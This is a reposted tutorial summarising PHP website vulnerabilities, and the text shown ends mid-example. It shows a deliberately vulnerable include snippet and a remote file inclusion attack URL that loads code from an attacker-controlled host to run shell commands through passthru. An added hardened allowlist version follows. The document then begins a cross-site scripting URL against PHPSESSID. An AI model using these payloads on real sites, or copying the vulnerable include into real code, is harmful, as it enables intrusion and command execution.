Summary of PHP website vulnerabilities (repost)

xiaoxiao2021-03-06  52

Some general techniques, such as cookie spoofing, are not discussed here; there is plenty of information about them online. So, let's analyze how these vulnerabilities are used!

First, let's discuss the file inclusion vulnerability. This vulnerability can fairly be called a PHP one. A remote attacker can use it to execute arbitrary commands with the permissions of the web process. Let's take an example: assume that a.php contains code like this:

<?php
// $include is expected to be a preset path, but the request can set it
include($include . "/xxx.php");
?>

In this code, $include is normally a preset path, but we can supply a path of our own to carry out an attack. For example, we submit a.php?include=http://web/b.php, where web is a host we control and b.php holds the code used for the attack. In b.php we can write something like passthru("/bin/ls /etc"); which makes it possible to carry out targeted attacks. (Note: the web server hosting b.php should not execute PHP code itself, otherwise there will be problems. For details see "How to attack common vulnerabilities in PHP programs".) Many applications have had problems with this vulnerability, for example: PayPal Store Front, HotNews, Mambo Open Source, PhpDig, YaBB SE, phpBB, Invisionboard, Solmetra Spaw Editor, Les Visiteurs, PhpGedView, X-Cart, etc.
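
The hardened counterpart of the include in a.php, as an added example that is not part of the original article: the request value is used only as a key into a fixed allowlist, so a URL or a traversal string never reaches include. The module names, the directory layout and the resolve_module helper are hypothetical.

```php
<?php
// Added example. Module names and directory layout are hypothetical.
// allow_url_include=Off (default since PHP 5.2) blocks the http:// case in the
// engine; the allowlist below also stops local paths and traversal.
const MODULES = [
    'news'  => 'modules/news',
    'forum' => 'modules/forum',
];

// Map a caller-supplied name to a file under $baseDir, or null if not allowed.
function resolve_module(string $baseDir, $requested): ?string
{
    // Arrays (include[]=x), URLs and ../ strings never match an allowlist key.
    if (!is_string($requested) || !array_key_exists($requested, MODULES)) {
        return null;
    }
    $root = realpath($baseDir);
    $path = realpath($baseDir . '/' . MODULES[$requested] . '/xxx.php');
    if ($root === false || $path === false) {
        return null;
    }
    // Defence in depth: the resolved file must stay under the base directory.
    $prefix = $root . DIRECTORY_SEPARATOR;
    return strncmp($path, $prefix, strlen($prefix)) === 0 ? $path : null;
}

// Constructed demonstration: throwaway tree, three inputs.
$base = sys_get_temp_dir() . '/include_demo_' . getmypid();
mkdir($base . '/modules/news', 0700, true);
file_put_contents($base . '/modules/news/xxx.php', "<?php echo \"news module loaded\\n\";");

foreach (['news', 'http://web/b.php', '../../etc'] as $input) {
    $file = resolve_module($base, $input);
    if ($file === null) {
        echo "rejected: $input\n";
    } else {
        include $file;
    }
}
```

Only the allowlisted name loads its module; the URL taken from the article and the traversal string are both rejected before any file is opened.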

Next, let's take a look at the script command execution vulnerability. It arises because URI parameters submitted by the user are not fully filtered: submitting data that contains malicious HTML code can cause a cross-site scripting attack, which may expose the target user's sensitive information. Again, an example: in PHP Transparent, PHP 4.3.1 and earlier versions, the index.php page lacks sufficient filtering of PHPSESSID, and the attack can be carried out with this code:

http://web/index.php?PHPSESSID=">